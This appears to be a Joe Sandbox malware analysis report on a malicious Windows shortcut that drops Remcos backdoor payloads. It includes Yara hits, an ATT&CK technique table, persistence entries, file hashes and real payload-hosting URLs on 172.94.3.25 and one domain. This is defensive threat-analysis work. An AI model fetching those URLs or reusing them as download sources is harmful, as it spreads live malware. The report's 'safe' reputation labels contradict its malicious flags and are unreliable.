                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00401626
                      Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,17_2_6FA5D72B
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,16_2_00404FAA
                      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
                      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                      | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                      | Gather Victim Identity Information | 112 Scripting | Valid Accounts | 2 Native API | 112 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                      | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 11 DLL Side-Loading | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                      | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 145 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                      | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 DLL Side-Loading | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 121 Application Layer Protocol | Traffic Duplication | Data Destruction |
                      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 Registry Run Keys / Startup Folder | 131 Masquerading | LSA Secrets | 11 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                      [Behavior graph: ID 1518489, Sample: Dlr7HYI6VL.lnk, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100]

                      | Source | Detection | Scanner | Label | Link |
                      | --- | --- | --- | --- | --- |
                      | Dlr7HYI6VL.lnk | 16% | ReversingLabs | Script-BAT.Trojan.Heuristic | |
                      | Dlr7HYI6VL.lnk | 100% | Joe Sandbox ML | | |

                      | Source | Detection | Scanner | Label | Link |
                      | --- | --- | --- | --- | --- |
                      | C:\Users\user\AppData\Local\Temp\gps | 100% | Avira | BDS/Backdoor.Gen | |
                      | C:\Users\user\AppData\Local\Temp\demhwk | 100% | Avira | BDS/Backdoor.Gen | |
                      | C:\Users\user\AppData\Local\Temp\qapuwvr | 100% | Avira | BDS/Backdoor.Gen | |
                      | C:\Users\user\AppData\Local\Temp\gps | 100% | Joe Sandbox ML | | |
                      | C:\Users\user\AppData\Local\Temp\demhwk | 100% | Joe Sandbox ML | | |
                      | C:\Users\user\AppData\Local\Temp\qapuwvr | 100% | Joe Sandbox ML | | |
                      | C:\Users\user\AppData\Local\Temp\demhwk | 87% | ReversingLabs | Win32.Backdoor.Remcos | |
                      | C:\Users\user\AppData\Local\Temp\gps | 87% | ReversingLabs | Win32.Backdoor.Remcos | |
                      | C:\Users\user\AppData\Local\Temp\qapuwvr | 87% | ReversingLabs | Win32.Backdoor.Remcos | |
                      | C:\Users\user\AppData\Roaming\AUGUST.exe | 3% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe | 0% | ReversingLabs | | |
                      | C:\Users\user\DZIPR.dll | 0% | ReversingLabs | | |
                      | C:\Users\user\DZIPR.exe | 0% | ReversingLabs | | |
                      No Antivirus matches
                      No Antivirus matches
                      | Source | Detection | Scanner | Label | Link |
                      | --- | --- | --- | --- | --- |
                      | http://www.symauth.com/cps0( | 0% | URL Reputation | safe | |
                      | https://www.datanumen.com/zip-repair/ | 0% | Avira URL Cloud | safe | |
                      | http://www.vmware.com/0 | 0% | Avira URL Cloud | safe | |
                      | https://www.digicert.c | 0% | Avira URL Cloud | safe | |
                      | fullimmersion777.com | 0% | Avira URL Cloud | safe | |
                      | http://172.94.3.25/ffo.bat | 0% | Avira URL Cloud | safe | |
                      | https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm | 0% | Avira URL Cloud | safe | |
                      | http://172.94.3.25/AUGUST.exe | 0% | Avira URL Cloud | safe | |
                      | https://g.live.com/odclientsettings/Prod1C: | 0% | Avira URL Cloud | safe | |
                      | http://172.94.3.25/hi.vbs | 0% | Avira URL Cloud | safe | |
                      | http://www.symauth.com/rpa00 | 0% | Avira URL Cloud | safe | |
                      | http://www.info-zip.org/ | 0% | Avira URL Cloud | safe | |
                      | http://www.vmware.com/0/ | 0% | Avira URL Cloud | safe | |
                      | http://c0rl.m%L | 0% | Avira URL Cloud | safe | |
                      | http://172.94.3.25/hello.bat | 0% | Avira URL Cloud | safe | |
                      | http://www.repairfile.com | 0% | Avira URL Cloud | safe | |
                      | https://g.live.com/odclientsettings/ProdV21C: | 0% | Avira URL Cloud | safe | |
                      | https://www.datanumen.com/%https://www.datanumen.com/zip-repair/ | 0% | Avira URL Cloud | safe | |
                      | http://support.datanumen.com | 0% | Avira URL Cloud | safe | |
                      | https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf | 0% | Avira URL Cloud | safe | |
                      | https://www.datanumen.com/support/ | 0% | Avira URL Cloud | safe | |
                      No contacted domains info
                      | Name | Malicious | Antivirus Detection | Reputation |
                      | --- | --- | --- | --- |
                      | http://172.94.3.25/hi.vbs | true | Avira URL Cloud: safe | unknown |
                      | http://172.94.3.25/AUGUST.exe | true | Avira URL Cloud: safe | unknown |
                      | http://172.94.3.25/ffo.bat | true | Avira URL Cloud: safe | unknown |
                      | fullimmersion777.com | true | Avira URL Cloud: safe | unknown |
                      | http://172.94.3.25/hello.bat | true | Avira URL Cloud: safe | unknown |
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      172.94.3.25 | unknown | United States | 3223 | VOXILITYGB | true
                      IP
                      127.0.0.1
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1518489
                      Start date and time:2024-09-25 18:39:22 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 25s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Dlr7HYI6VL.lnk
                      renamed because original name is a hash value
                      Original Sample Name:383bec1808c99dcffafa9f4e03f104a4.lnk
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winLNK@44/34@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 70
                      • Number of non-executed functions: 215
                      Cookbook Comments:
                      • Found application associated with file extension: .lnk
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Dlr7HYI6VL.lnk
                      Time | Type | Description
                      12:40:17 | API Interceptor | 86x Sleep call for process: powershell.exe modified
                      12:40:45 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                      12:41:05 | API Interceptor | 6x Sleep call for process: cmd.exe modified
                      18:40:49 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
                      18:40:53 | Task Scheduler | Run new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      18:41:02 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      172.94.3.25 | MdkbG2pK4l.lnk | malicious | Remcos | lawyerconsult.top/AUGUST.exe
                      172.94.3.25 | 55Ka50lb6Z.bat | malicious | Remcos | 172.94.3.25/AUGUST.exe
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      VOXILITYGB | MdkbG2pK4l.lnk | malicious | Remcos | 172.94.3.25
                      VOXILITYGB | 55Ka50lb6Z.bat | malicious | Remcos | 172.94.3.25
                      VOXILITYGB | zz91Dcv5Kf.dll | malicious | Remcos | 172.94.9.207
                      VOXILITYGB | V9HUU0LCin.dll | malicious | Remcos | 172.94.9.207
                      VOXILITYGB | E5r67vtBtc6.exe | malicious | Xmrig | 172.94.15.211
                      VOXILITYGB | Miner-XMR2.exe | malicious | Xmrig | 172.94.15.211
                      VOXILITYGB | af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe | malicious | Nanocore, Remcos | 104.243.242.162
                      VOXILITYGB | zczsJahg5p.exe | malicious | Nanocore, Remcos, PureLog Stealer | 104.243.242.164
                      VOXILITYGB | SLL8zVmaGj.elf | malicious | Unknown | 185.247.61.190
                      VOXILITYGB | tfEceyjWwA.exe | malicious | PureLog Stealer, zgRAT | 104.243.242.171
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      C:\Users\user\AppData\Local\Temp\gps | MdkbG2pK4l.lnk | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\gps | epht1Y3TGZ.exe | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\gps | 55Ka50lb6Z.bat | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\qapuwvr | MdkbG2pK4l.lnk | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\qapuwvr | epht1Y3TGZ.exe | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\qapuwvr | 55Ka50lb6Z.bat | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\demhwk | MdkbG2pK4l.lnk | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\demhwk | epht1Y3TGZ.exe | malicious | Remcos
                      C:\Users\user\AppData\Local\Temp\demhwk | 55Ka50lb6Z.bat | malicious | Remcos
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7515639318285886
                                        Encrypted:false
                                        SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0p:9JZj5MiKNnNhoxuI
                                        MD5:F1BFBF4F39082D5059F0B7968477B3FE
                                        SHA1:A3BE39F7CEE97C0555F44849CAC867AC09C2E88A
                                        SHA-256:2786A894A0AA0BF044E711ADC8ED7E20623349B41B19E965BB0616027DF68B02
                                        SHA-512:77EC3E804F24605403E883F700C2C32BDC413A2B4370A314B08193D89E72009CDAC0E1995984CEEB45CAAF7AEB0A1FCAD75F3EAE8DEDD42BD2D5F88EE2B1EBE6
                                        Malicious:false
                                         Preview:(binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0xa0cf7431, page size 16384, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.7555560568013207
                                        Encrypted:false
                                        SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                        MD5:D1998F10F4CB646E1E69FBC51737E2CE
                                        SHA1:5FE5BAC2C3B7F3B5A2DF251A7D998C9B6361B08F
                                        SHA-256:4A91B8718E7DEC025596902AE03552BCA10BFBA1A2C77320DD19D61DFB808C9B
                                        SHA-512:3E5FB86433FED44CB905218EF08A45905C0222A40E77263C14194021478C94F5385C9AB7D9276CDF5AB9B028F53351C2103D8B25F786A07D6071F6EACC12C565
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07827707258297226
                                        Encrypted:false
                                        SSDEEP:3:iYe/8sXqfNaAPaU1lZZC/alluxmO+l/SNxOf:iz/8sANDPaU7gmOH
                                        MD5:4406F7BF25502F43065DF14AA62780EF
                                        SHA1:C84A535029CCFC8F24EAC0528FCE18BD344B3F8B
                                        SHA-256:A3A79B86C65F0491C1CD51FE35A0FE974752D8F0B5C7D38BD0E2543AD2ACB65A
                                        SHA-512:710D3B15C8A1CD04258F1FEB699314F337EF56ADF30411F12A123F203FD38D6A4E4EB1F052852009A9B2462E4425DE9E44750A26310EB0A77BB0285383A8884F
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641700764511553
                                        Encrypted:false
                                        SSDEEP:24576:cJ7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:cxq6weE0lgBVgJdnwPBuR0H
                                        MD5:03A7073785255DCCB5413E58414CEFD0
                                        SHA1:3A50F08F2359A14ACB81E9A8B073FEEE28C0AFAF
                                        SHA-256:A46DD6DCF1408409688F49DA6C036EBDC5A16D1D06C2DA0E2BA9B758B47ABCA4
                                        SHA-512:FC28F9B38DF9E45614DBE955B9F0990079A0E2F5064CC2750CB328DDF68FE0D39D701D4C804FCF24DEE1B5D4650BC0BA83804917F4D76A44534CF9BB4D06DE62
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
